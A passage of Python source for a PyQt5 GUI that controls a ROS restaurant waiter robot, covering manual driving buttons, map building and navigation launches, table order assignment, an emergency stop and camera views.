goal.target_pose.pose.orientation.y = 0.0
goal.target_pose.pose.orientation.z = 0.701
goal.target_pose.pose.orientation.w = 0.712
client.send_goal(goal)
wait = client.wait_for_result()
if not wait:
rospy.logerr("Action server not available!")
rospy.signal_shutdown("Action server not available!")
else:
return client.get_result()
def button_released(self):
global move_cmd
move_cmd.linear.x = 0.0
move_cmd.angular.z = 0.0
move_pub.publish(move_cmd)
def fl_button_pressed(self):
global move_cmd
move_cmd.linear.x = 1.0
move_cmd.angular.z = 2.0
move_pub.publish(move_cmd)
def f_button_pressed(self):
global move_cmd
move_cmd.linear.x = 1.0
move_cmd.angular.z = 0.0
move_pub.publish(move_cmd)
def fr_button_pressed(self):
global move_cmd
move_cmd.linear.x = 1.0
move_cmd.angular.z = -2.0
move_pub.publish(move_cmd)
def l_button_pressed(self):
global move_cmd
move_cmd.linear.x = 0.0
move_cmd.angular.z = 2.0
move_pub.publish(move_cmd)
def stop_button_pressed(self):
global move_cmd
move_cmd.linear.x = 0.0
move_cmd.angular.z = 0.0
move_pub.publish(move_cmd)
def r_button_pressed(self):
global move_cmd
move_cmd.linear.x = 0.0
move_cmd.angular.z = -2.0
move_pub.publish(move_cmd)
def bl_button_pressed(self):
global move_cmd
move_cmd.linear.x = -1.0
move_cmd.angular.z = -2.0
move_pub.publish(move_cmd)
def b_button_pressed(self):
global move_cmd
move_cmd.linear.x = -1.0
move_cmd.angular.z = 0.0
move_pub.publish(move_cmd)
def br_button_pressed(self):
global move_cmd
move_cmd.linear.x = -1.0
move_cmd.angular.z = 2.0
move_pub.publish(move_cmd)
def manual_map_thread(self):
t1 = Thread(target=self.manual_map_create)
t1.start()
def manual_map_create(self):
path = "/home/adip/catkin_ws/src/waiter_bot_description/map"
dirc = os.listdir(path)
if len(dirc) == 0:
self.tabWidget.setCurrentIndex(1)
handle = Popen('roslaunch waiter_bot_description gmapping.launch', shell=True)
if self.stop_flag:
handle.kill()
else:
msg = QtWidgets.QMessageBox()
msg.setText("Map already existing. Do you want to delete it?")
msg.setWindowTitle("Error")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok | QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
if retval == QtWidgets.QMessageBox.Ok:
if self.map_flag:
for f in dirc:
os.remove(os.path.join(path, f))
else:
msg = QtWidgets.QMessageBox()
msg.setText("Map in use unable to delete")
msg.setWindowTitle("Error")
msg.setStandardButtons(QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
def autonomous_map_thread(self):
t1 = Thread(target=self.autonomous_map_create)
t1.start()
def autonomous_map_create(self):
path = "/home/adip/catkin_ws/src/waiter_bot_description/map"
dirc = os.listdir(path)
if len(dirc) == 0:
handle1 = Popen('roslaunch waiter_bot_description auto_navigation.launch', shell=True)
handle2 = Popen('roslaunch explore_lite explore.launch', shell=True)
if self.stop_flag:
handle1.kill()
handle2.kill()
else:
msg = QtWidgets.QMessageBox()
msg.setText("Map already existing. Do you want to delete it?")
msg.setWindowTitle("Error")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok | QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
if retval == QtWidgets.QMessageBox.Ok:
if self.map_view:
for f in dirc:
os.remove(os.path.join(path, f))
else:
msg = QtWidgets.QMessageBox()
msg.setText("Map in use unable to delete")
msg.setWindowTitle("Error")
msg.setStandardButtons(QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
def map_view_thread(self):
t1 = Thread(target=self.map_view_button)
t1.start()
def map_view_button(self):
path = "/home/adip/catkin_ws/src/waiter_bot_description/map"
dirc = os.listdir(path)
if len(dirc) == 0:
handle = Popen('rosrun map_server map_saver -f ~/catkin_ws/src/waiter_bot_description/map/map1', shell=True)
else:
image = cv2.imread('/home/adip/catkin_ws/src/waiter_bot_description/map/map1.pgm')
cv2.imshow('image window', image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def emergency_stop_thread(self):
t1 = Thread(target=self.emergency_stop_button)
t1.start()
def emergency_stop_button(self):
self.stop_flag = True
global move_cmd
move_cmd.linear.x = 0.0
move_cmd.angular.z = 0.0
move_pub.publish(move_cmd)
handle = Popen('rostopic pub /move_base/cancel actionlib_msgs/GoalID -- {}', shell=True)
def start_auto_nav_thread(self):
t1 = Thread(target=self.start_auto_nav_button)
t1.start()
def start_auto_nav_button(self):
self.map_flag = False
handle = Popen('roslaunch waiter_bot_description navigation.launch', shell=True)
if self.stop_flag:
handle1.kill()
def selectError(self):
msg = QtWidgets.QMessageBox()
msg.setText("Please select the tray number first than click on the respective table number")
msg.setWindowTitle("Error")
msg.setStandardButtons(QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
def duplicateError(self):
msg = QtWidgets.QMessageBox()
msg.setText("Selected tray already assigned to another table please select a different tray")
msg.setWindowTitle("Error")
msg.setStandardButtons(QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
def check_tray(self, tray):
global table_num
if table_num:
res = any(tray in sublist for sublist in table_num)
return not res
else:
return True
def max_tray(self):
msg = QtWidgets.QMessageBox()
msg.setText("All trays occupied. Maximum 5 order allotment")
msg.setWindowTitle("Error")
msg.setStandardButtons(QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
def table1_button(self):
global table_num
content = self.comboBox.currentText()
if content == "Select":
self.selectError()
elif len(table_num)>5:
self.max_tray()
elif (table_num and self.check_tray(content)) or (not table_num):
l = ["t1", content]
table_num.append(l)
else:
self.duplicateError()
def table2_button(self):
global table_num
content = self.comboBox_3.currentText()
if content == "Select":
self.selectError()
elif len(table_num)>5:
self.max_tray()
elif (table_num and self.check_tray(content)) or (not table_num):
l = ["t2", content]
table_num.append(l)
else:
self.duplicateError()
def table3_button(self):
global table_num
content = self.comboBox_2.currentText()
if content == "Select":
self.selectError()
elif len(table_num)>5:
self.max_tray()
elif (table_num and self.check_tray(content)) or (not table_num):
l = ["t3", content]
table_num.append(l)
else:
self.duplicateError()
def table4_button(self):
global table_num
content = self.comboBox_4.currentText()
if content == "Select":
self.selectError()
elif len(table_num)>5:
self.max_tray()
elif (table_num and self.check_tray(content)) or (not table_num):
l = ["t4", content]
table_num.append(l)
else:
self.duplicateError()
def table5_button(self):
global table_num
content = self.comboBox_5.currentText()
if content == "Select":
self.selectError()
elif len(table_num)>5:
self.max_tray()
elif (table_num and self.check_tray(content)) or (not table_num):
l = ["t5", content]
table_num.append(l)
else:
self.duplicateError()
def table6_button(self):
global table_num
content = self.comboBox_6.currentText()
if content == "Select":
self.selectError()
elif len(table_num)>5:
self.max_tray()
elif (table_num and self.check_tray(content)) or (not table_num):
l = ["t6", content]
table_num.append(l)
else:
self.duplicateError()
def table7_button(self):
global table_num
content = self.comboBox_7.currentText()
if content == "Select":
self.selectError()
elif len(table_num)>5:
self.max_tray()
elif (table_num and self.check_tray(content)) or (not table_num):
l = ["t7", content]
table_num.append(l)
else:
self.duplicateError()
def table8_button(self):
global table_num
content = self.comboBox_8.currentText()
if content == "Select":
self.selectError()
elif len(table_num)>5:
self.max_tray()
elif (table_num and self.check_tray(content)) or (not table_num):
l = ["t8", content]
table_num.append(l)
else:
self.duplicateError()
def table9_button(self):
global table_num
content = self.comboBox_9.currentText()
if content == "Select":
self.selectError()
elif len(table_num)>5:
self.max_tray()
elif (table_num and self.check_tray(content)) or (not table_num):
l = ["t9", content]
table_num.append(l)
else:
self.duplicateError()
def reset(self):
global table_num
table_num = [[]]
self.comboBox.setCurrentText("Select")
self.comboBox_2.setCurrentText("Select")
self.comboBox_3.setCurrentText("Select")
self.comboBox_4.setCurrentText("Select")
self.comboBox_5.setCurrentText("Select")
self.comboBox_6.setCurrentText("Select")
self.comboBox_7.setCurrentText("Select")
self.comboBox_8.setCurrentText("Select")
self.comboBox_9.setCurrentText("Select")
def go_table_thread(self):
t1 = Thread(target=self.go_table_button)
t1.start()
def go_table_button(self):
global table_num, table_cor
for t in range(1, len(table_num)):
for i in range(len(table_cor)):
if (table_num[t][0] == table_cor[i][0]) and (not self.stop_flag):
self.movebase_client(table_cor[i][1], table_cor[i][2])
if not self.stop_flag:
msg = QtWidgets.QMessageBox()
msg.setText("Table Number "+str(i+1)+" order is in "+table_num[t][1]+"\nDelivery Completed?")
msg.setWindowTitle("Status")
msg.setStandardButtons(QtWidgets.QMessageBox.Ok | QtWidgets.QMessageBox.Cancel)
retval = msg.exec_()
else:
pass
if not self.stop_flag:
self.movebase_client(kitchen[0], kitchen[1])
self.reset()
def return_kitchen_thread(self):
t1 = Thread(target=self.return_kitchen_button)
t1.start()
def return_kitchen_button(self):
self.reset()
self.stop_flag = False
self.movebase_client(kitchen[0], kitchen[1])
def battery_low_thread(self):
t1 = Thread(target=self.battery_low_button)
t1.start()
def battery_low_button(self):
global battery
battery = 10
self.label_12.setText("10%")
self.movebase_client(charge[0], charge[1])
def battery_status_thread(self):
t1 = Thread(target=self.battery_status)
t1.start()
def battery_status(self):
global battery
while battery>=0:
if battery <=10:
self.movebase_client(charge[0], charge[1])
time.sleep(20)
battery=battery-1
self.label_12.setText(str(battery)+"%")
self.stop_flag = True
handle = Popen('rostopic pub /move_base/cancel actionlib_msgs/GoalID -- {}', shell=True)
def b_cam_thread(self):
t1 = Thread(target=self.b_cam_button)
t1.start()
def b_cam_button(self):
handle_b_cam = Popen('rosrun image_view image_view image:=/b_camera/color/image_raw', shell=True)
def u_cam_thread(self):
t2 = Thread(target=self.u_cam_button)
t2.start()
def u_cam_button(self):
handle_u_cam = Popen('rosrun image_view image_view image:=/f_camera/color/image_raw', shell=True)
def setupUi(self, waiter_bot):
waiter_bot.setObjectName("waiter_bot")
waiter_bot.resize(669, 808)
self.label = QtWidgets.QLabel(waiter_bot)
self.label.setGeometry(QtCore.QRect(0, 10, 651, 41))
font = QtGui.QFont()
font.setFamily("Tibetan Machine Uni")
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.label.setTextFormat(QtCore.Qt.RichText)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayoutWidget_3 = QtWidgets.QWidget(waiter_bot)
self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(10, 60, 171, 181))
self.verticalLayoutWidget_3.setObjectName("verticalLayoutWidget_3")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_3)
self.verticalLayout_3.setContentsMargins(0, 9, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget_3)
self.label_2.setMinimumSize(QtCore.QSize(0, 29))
self.label_2.setMaximumSize(QtCore.QSize(157, 23))
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.verticalLayout_3.addWidget(self.label_2)
self.label_12 = QtWidgets.QLabel(self.verticalLayoutWidget_3)
self.label_12.setMinimumSize(QtCore.QSize(0, 74))
self.label_12.setMaximumSize(QtCore.QSize(164, 91))
font = QtGui.QFont()
font.setPointSize(16)
self.label_12.setFont(font)
self.label_12.setAlignment(QtCore.Qt.AlignCenter)
self.label_12.setObjectName("label_12")
self.verticalLayout_3.addWidget(self.label_12)
self.battery_low = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
self.battery_low.setMinimumSize(QtCore.QSize(0, 0))
self.battery_low.setMaximumSize(QtCore.QSize(165, 37))
self.battery_low.setObjectName("battery_low")
self.verticalLayout_3.addWidget(self.battery_low)
self.tabWidget = QtWidgets.QTabWidget(waiter_bot)
self.tabWidget.setGeometry(QtCore.QRect(190, 60, 471, 741))
self.tabWidget.setMinimumSize(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setFamily("Tibetan Machine Uni")
font.setPointSize(14)
self.tabWidget.setFont(font)
self.tabWidget.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.tabWidget.setAutoFillBackground(False)
self.tabWidget.setObjectName("tabWidget")
self.table_navigation = QtWidgets.QWidget()
self.table_navigation.setObjectName("table_navigation")
self.gridLayoutWidget_2 = QtWidgets.QWidget(self.table_navigation)
self.gridLayoutWidget_2.setGeometry(QtCore.QRect(10, 0, 461, 690))
self.gridLayoutWidget_2.setObjectName("gridLayoutWidget_2")
self.gridLayout_2 = QtWidgets.QGridLayout(self.gridLayoutWidget_2)
self.gridLayout_2.setContentsMargins(0, 0, 0, 0)
self.gridLayout_2.setVerticalSpacing(0)
self.gridLayout_2.setObjectName("gridLayout_2")
self.table6 = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.table6.setMinimumSize(QtCore.QSize(0, 88))
self.table6.setMaximumSize(QtCore.QSize(101, 92))
self.table6.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/table.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.table6.setIcon(icon)
self.table6.setIconSize(QtCore.QSize(60, 60))
self.table6.setObjectName("table6")
self.gridLayout_2.addWidget(self.table6, 3, 2, 1, 1)
self.table7 = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.table7.setMinimumSize(QtCore.QSize(0, 88))
self.table7.setMaximumSize(QtCore.QSize(101, 92))
self.table7.setText("")
self.table7.setIcon(icon)
self.table7.setIconSize(QtCore.QSize(60, 60))
self.table7.setObjectName("table7")
self.gridLayout_2.addWidget(self.table7, 6, 0, 1, 1)
self.table1 = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.table1.setMinimumSize(QtCore.QSize(0, 88))
self.table1.setMaximumSize(QtCore.QSize(101, 92))
self.table1.setText("")
self.table1.setIcon(icon)
self.table1.setIconSize(QtCore.QSize(60, 60))
self.table1.setObjectName("table1")
self.gridLayout_2.addWidget(self.table1, 0, 0, 1, 1)
self.go_table = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.go_table.setMinimumSize(QtCore.QSize(0, 88))
self.go_table.setMaximumSize(QtCore.QSize(101, 71))
self.go_table.setText("")
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/go.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.go_table.setIcon(icon1)
self.go_table.setIconSize(QtCore.QSize(70, 70))
self.go_table.setObjectName("go_table")
self.gridLayout_2.addWidget(self.go_table, 9, 2, 1, 1)
self.table4 = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.table4.setMinimumSize(QtCore.QSize(0, 88))
self.table4.setMaximumSize(QtCore.QSize(101, 92))
self.table4.setText("")
self.table4.setIcon(icon)
self.table4.setIconSize(QtCore.QSize(60, 60))
self.table4.setObjectName("table4")
self.gridLayout_2.addWidget(self.table4, 3, 0, 1, 1)
self.return_kitchen = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.return_kitchen.setMinimumSize(QtCore.QSize(0, 88))
self.return_kitchen.setMaximumSize(QtCore.QSize(101, 71))
self.return_kitchen.setText("")
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/return.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.return_kitchen.setIcon(icon2)
self.return_kitchen.setIconSize(QtCore.QSize(60, 60))
self.return_kitchen.setObjectName("return_kitchen")
self.gridLayout_2.addWidget(self.return_kitchen, 9, 0, 1, 1)
self.table9 = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.table9.setMinimumSize(QtCore.QSize(0, 88))
self.table9.setMaximumSize(QtCore.QSize(101, 92))
self.table9.setText("")
self.table9.setIcon(icon)
self.table9.setIconSize(QtCore.QSize(60, 60))
self.table9.setObjectName("table9")
self.gridLayout_2.addWidget(self.table9, 6, 2, 1, 1)
self.table3 = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.table3.setMinimumSize(QtCore.QSize(0, 88))
self.table3.setMaximumSize(QtCore.QSize(101, 92))
self.table3.setText("")
self.table3.setIcon(icon)
self.table3.setIconSize(QtCore.QSize(60, 60))
self.table3.setObjectName("table3")
self.gridLayout_2.addWidget(self.table3, 0, 2, 1, 1)
self.table8 = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.table8.setMinimumSize(QtCore.QSize(0, 88))
self.table8.setMaximumSize(QtCore.QSize(101, 92))
self.table8.setText("")
self.table8.setIcon(icon)
self.table8.setIconSize(QtCore.QSize(60, 60))
self.table8.setObjectName("table8")
self.gridLayout_2.addWidget(self.table8, 6, 1, 1, 1)
self.table2 = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.table2.setMinimumSize(QtCore.QSize(0, 88))
self.table2.setMaximumSize(QtCore.QSize(101, 92))
self.table2.setText("")
self.table2.setIcon(icon)
self.table2.setIconSize(QtCore.QSize(60, 60))
self.table2.setObjectName("table2")
self.gridLayout_2.addWidget(self.table2, 0, 1, 1, 1)
self.table5 = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.table5.setMinimumSize(QtCore.QSize(0, 88))
self.table5.setMaximumSize(QtCore.QSize(101, 92))
self.table5.setText("")
self.table5.setIcon(icon)
self.table5.setIconSize(QtCore.QSize(60, 60))
self.table5.setObjectName("table5")
self.gridLayout_2.addWidget(self.table5, 3, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(self.gridLayoutWidget_2)
self.label_3.setMinimumSize(QtCore.QSize(0, 23))
self.label_3.setMaximumSize(QtCore.QSize(96, 12))
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName("label_3")
self.gridLayout_2.addWidget(self.label_3, 2, 0, 1, 1)
self.label_6 = QtWidgets.QLabel(self.gridLayoutWidget_2)
self.label_6.setMinimumSize(QtCore.QSize(0, 23))
self.label_6.setMaximumSize(QtCore.QSize(96, 12))
self.label_6.setAlignment(QtCore.Qt.AlignCenter)
self.label_6.setObjectName("label_6")
self.gridLayout_2.addWidget(self.label_6, 5, 0, 1, 1)
self.label_8 = QtWidgets.QLabel(self.gridLayoutWidget_2)
self.label_8.setMinimumSize(QtCore.QSize(0, 23))
self.label_8.setMaximumSize(QtCore.QSize(96, 12))
self.label_8.setAlignment(QtCore.Qt.AlignCenter)
self.label_8.setObjectName("label_8")
self.gridLayout_2.addWidget(self.label_8, 5, 2, 1, 1)
self.label_5 = QtWidgets.QLabel(self.gridLayoutWidget_2)
self.label_5.setMinimumSize(QtCore.QSize(0, 23))
self.label_5.setMaximumSize(QtCore.QSize(96, 12))
self.label_5.setAlignment(QtCore.Qt.AlignCenter)
self.label_5.setObjectName("label_5")
self.gridLayout_2.addWidget(self.label_5, 2, 2, 1, 1)
self.label_4 = QtWidgets.QLabel(self.gridLayoutWidget_2)
self.label_4.setMinimumSize(QtCore.QSize(0, 23))
self.label_4.setMaximumSize(QtCore.QSize(96, 12))
self.label_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_4.setObjectName("label_4")
self.gridLayout_2.addWidget(self.label_4, 2, 1, 1, 1)
self.label_7 = QtWidgets.QLabel(self.gridLayoutWidget_2)
self.label_7.setMinimumSize(QtCore.QSize(0, 23))
self.label_7.setMaximumSize(QtCore.QSize(96, 12))
self.label_7.setAlignment(QtCore.Qt.AlignCenter)
self.label_7.setObjectName("label_7")
self.gridLayout_2.addWidget(self.label_7, 5, 1, 1, 1)
self.label_9 = QtWidgets.QLabel(self.gridLayoutWidget_2)
self.label_9.setMinimumSize(QtCore.QSize(0, 23))
self.label_9.setMaximumSize(QtCore.QSize(96, 12))
self.label_9.setAlignment(QtCore.Qt.AlignCenter)
self.label_9.setObjectName("label_9")
self.gridLayout_2.addWidget(self.label_9, 8, 0, 1, 1)
self.label_10 = QtWidgets.QLabel(self.gridLayoutWidget_2)
self.label_10.setMinimumSize(QtCore.QSize(0, 23))
self.label_10.setMaximumSize(QtCore.QSize(96, 12))
self.label_10.setAlignment(QtCore.Qt.AlignCenter)
self.label_10.setObjectName("label_10")
self.gridLayout_2.addWidget(self.label_10, 8, 1, 1, 1)
self.label_11 = QtWidgets.QLabel(self.gridLayoutWidget_2)
self.label_11.setMinimumSize(QtCore.QSize(0, 23))
self.label_11.setMaximumSize(QtCore.QSize(96, 12))
self.label_11.setAlignment(QtCore.Qt.AlignCenter)
self.label_11.setObjectName("label_11")
self.gridLayout_2.addWidget(self.label_11, 8, 2, 1, 1)
self.start_auto_nav = QtWidgets.QPushButton(self.gridLayoutWidget_2)
self.start_auto_nav.setObjectName("start_auto_nav")
self.gridLayout_2.addWidget(self.start_auto_nav, 9, 1, 1, 1)
self.comboBox_5 = QtWidgets.QComboBox(self.gridLayoutWidget_2)
self.comboBox_5.setMinimumSize(QtCore.QSize(0, 30))
self.comboBox_5.setMaximumSize(QtCore.QSize(100, 30))
self.comboBox_5.setObjectName("comboBox_5")
self.comboBox_5.addItem("")
self.comboBox_5.addItem("")
self.comboBox_5.addItem("")
self.comboBox_5.addItem("")
self.comboBox_5.addItem("")
self.comboBox_5.addItem("")
self.gridLayout_2.addWidget(self.comboBox_5, 4, 1, 1, 1)
self.comboBox_6 = QtWidgets.QComboBox(self.gridLayoutWidget_2)
self.comboBox_6.setMinimumSize(QtCore.QSize(0, 30))
self.comboBox_6.setMaximumSize(QtCore.QSize(100, 30))
self.comboBox_6.setObjectName("comboBox_6")
self.comboBox_6.addItem("")
self.comboBox_6.addItem("")
self.comboBox_6.addItem("")
self.comboBox_6.addItem("")
self.comboBox_6.addItem("")
self.comboBox_6.addItem("")
self.gridLayout_2.addWidget(self.comboBox_6, 4, 2, 1, 1)
self.comboBox_3 = QtWidgets.QComboBox(self.gridLayoutWidget_2)
self.comboBox_3.setMinimumSize(QtCore.QSize(0, 30))
self.comboBox_3.setMaximumSize(QtCore.QSize(100, 30))
self.comboBox_3.setObjectName("comboBox_3")
self.comboBox_3.addItem("")
self.comboBox_3.addItem("")
self.comboBox_3.addItem("")
self.comboBox_3.addItem("")
self.comboBox_3.addItem("")
self.comboBox_3.addItem("")
self.gridLayout_2.addWidget(self.comboBox_3, 1, 1, 1, 1)
self.comboBox_4 = QtWidgets.QComboBox(self.gridLayoutWidget_2)
self.comboBox_4.setMinimumSize(QtCore.QSize(0, 30))
self.comboBox_4.setMaximumSize(QtCore.QSize(100, 30))
self.comboBox_4.setObjectName("comboBox_4")
self.comboBox_4.addItem("")
self.comboBox_4.addItem("")
self.comboBox_4.addItem("")
self.comboBox_4.addItem("")
self.comboBox_4.addItem("")
self.comboBox_4.addItem("")
self.gridLayout_2.addWidget(self.comboBox_4, 4, 0, 1, 1)
self.comboBox_2 = QtWidgets.QComboBox(self.gridLayoutWidget_2)
self.comboBox_2.setMinimumSize(QtCore.QSize(0, 30))
self.comboBox_2.setMaximumSize(QtCore.QSize(100, 30))
self.comboBox_2.setObjectName("comboBox_2")
self.comboBox_2.addItem("")
self.comboBox_2.addItem("")
self.comboBox_2.addItem("")
self.comboBox_2.addItem("")
self.comboBox_2.addItem("")
self.comboBox_2.addItem("")
self.gridLayout_2.addWidget(self.comboBox_2, 1, 2, 1, 1)
self.comboBox = QtWidgets.QComboBox(self.gridLayoutWidget_2)
self.comboBox.setMinimumSize(QtCore.QSize(0, 30))
self.comboBox.setMaximumSize(QtCore.QSize(100, 30))
self.comboBox.setObjectName("comboBox")
self.comboBox.addItem("")
self.comboBox.addItem("")
self.comboBox.addItem("")
self.comboBox.addItem("")
self.comboBox.addItem("")
self.comboBox.addItem("")
self.gridLayout_2.addWidget(self.comboBox, 1, 0, 1, 1)
self.comboBox_7 = QtWidgets.QComboBox(self.gridLayoutWidget_2)
self.comboBox_7.setMinimumSize(QtCore.QSize(0, 30))
self.comboBox_7.setMaximumSize(QtCore.QSize(100, 30))
self.comboBox_7.setObjectName("comboBox_7")
self.comboBox_7.addItem("")
self.comboBox_7.addItem("")
self.comboBox_7.addItem("")
self.comboBox_7.addItem("")
self.comboBox_7.addItem("")
self.comboBox_7.addItem("")
self.gridLayout_2.addWidget(self.comboBox_7, 7, 0, 1, 1)
self.comboBox_8 = QtWidgets.QComboBox(self.gridLayoutWidget_2)
self.comboBox_8.setMinimumSize(QtCore.QSize(0, 30))
self.comboBox_8.setMaximumSize(QtCore.QSize(100, 30))
self.comboBox_8.setObjectName("comboBox_8")
self.comboBox_8.addItem("")
self.comboBox_8.addItem("")
self.comboBox_8.addItem("")
self.comboBox_8.addItem("")
self.comboBox_8.addItem("")
self.comboBox_8.addItem("")
self.gridLayout_2.addWidget(self.comboBox_8, 7, 1, 1, 1)
self.comboBox_9 = QtWidgets.QComboBox(self.gridLayoutWidget_2)
self.comboBox_9.setMinimumSize(QtCore.QSize(0, 30))
self.comboBox_9.setMaximumSize(QtCore.QSize(100, 30))
self.comboBox_9.setObjectName("comboBox_9")
self.comboBox_9.addItem("")
self.comboBox_9.addItem("")
self.comboBox_9.addItem("")
self.comboBox_9.addItem("")
self.comboBox_9.addItem("")
self.comboBox_9.addItem("")
self.gridLayout_2.addWidget(self.comboBox_9, 7, 2, 1, 1)
self.tabWidget.addTab(self.table_navigation, "")
self.manual_control = QtWidgets.QWidget()
self.manual_control.setObjectName("manual_control")
self.gridLayoutWidget = QtWidgets.QWidget(self.manual_control)
self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 70, 461, 471))
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.gridLayout = QtWidgets.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.F = QtWidgets.QPushButton(self.gridLayoutWidget)
self.F.setMinimumSize(QtCore.QSize(0, 100))
self.F.setMaximumSize(QtCore.QSize(102, 100))
self.F.setText("")
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/up arrow.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.F.setIcon(icon3)
self.F.setIconSize(QtCore.QSize(60, 60))
self.F.setObjectName("F")
self.gridLayout.addWidget(self.F, 0, 1, 1, 1)
self.stop = QtWidgets.QPushButton(self.gridLayoutWidget)
self.stop.setMinimumSize(QtCore.QSize(0, 100))
self.stop.setMaximumSize(QtCore.QSize(102, 100))
self.stop.setText("")
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/stop.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.stop.setIcon(icon4)
self.stop.setIconSize(QtCore.QSize(60, 60))
self.stop.setObjectName("stop")
self.gridLayout.addWidget(self.stop, 1, 1, 1, 1)
self.LF = QtWidgets.QPushButton(self.gridLayoutWidget)
self.LF.setMinimumSize(QtCore.QSize(0, 100))
self.LF.setMaximumSize(QtCore.QSize(102, 100))
self.LF.setText("")
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/left up.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.LF.setIcon(icon5)
self.LF.setIconSize(QtCore.QSize(60, 60))
self.LF.setAutoDefault(False)
self.LF.setDefault(False)
self.LF.setFlat(False)
self.LF.setObjectName("LF")
self.gridLayout.addWidget(self.LF, 0, 0, 1, 1)
self.B = QtWidgets.QPushButton(self.gridLayoutWidget)
self.B.setMinimumSize(QtCore.QSize(0, 100))
self.B.setMaximumSize(QtCore.QSize(102, 100))
self.B.setText("")
icon6 = QtGui.QIcon()
icon6.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/down arrow.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.B.setIcon(icon6)
self.B.setIconSize(QtCore.QSize(60, 60))
self.B.setObjectName("B")
self.gridLayout.addWidget(self.B, 2, 1, 1, 1)
self.RF = QtWidgets.QPushButton(self.gridLayoutWidget)
self.RF.setMinimumSize(QtCore.QSize(0, 100))
self.RF.setMaximumSize(QtCore.QSize(102, 100))
self.RF.setText("")
icon7 = QtGui.QIcon()
icon7.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/right up.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.RF.setIcon(icon7)
self.RF.setIconSize(QtCore.QSize(60, 60))
self.RF.setObjectName("RF")
self.gridLayout.addWidget(self.RF, 0, 2, 1, 1)
self.LB = QtWidgets.QPushButton(self.gridLayoutWidget)
self.LB.setMinimumSize(QtCore.QSize(0, 100))
self.LB.setMaximumSize(QtCore.QSize(102, 100))
self.LB.setText("")
icon8 = QtGui.QIcon()
icon8.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/right down.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.LB.setIcon(icon8)
self.LB.setIconSize(QtCore.QSize(60, 60))
self.LB.setObjectName("LB")
self.gridLayout.addWidget(self.LB, 2, 0, 1, 1)
self.RB = QtWidgets.QPushButton(self.gridLayoutWidget)
self.RB.setMinimumSize(QtCore.QSize(0, 100))
self.RB.setMaximumSize(QtCore.QSize(102, 100))
self.RB.setText("")
icon9 = QtGui.QIcon()
icon9.addPixmap(QtGui.QPixmap("/home/adip/catkin_ws/src/waiter_bot_description/src/left down.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.RB.setIcon(icon9)
self.RB.setIconSize(QtCore.QSize(60, 60))
self.RB.setObjectName("RB")
self.gridLayout.addWidget(self.RB, 2, 2, 1, 1)
self.L = QtWidgets.QPushButton(self.gridLayoutWidget)
self.L.setMinimumSize(QtCore.QSize(0, 100))
self.L.setMaximumSize(QtCore.QSize(102, 100))
self.L.setText("")
icon10 = QtGui.QIcon()
